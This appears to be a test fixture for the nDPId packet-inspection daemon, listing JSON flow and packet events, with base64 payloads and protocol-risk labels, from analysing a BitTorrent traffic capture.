00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="}
00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="}
01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="}
01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="}
00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
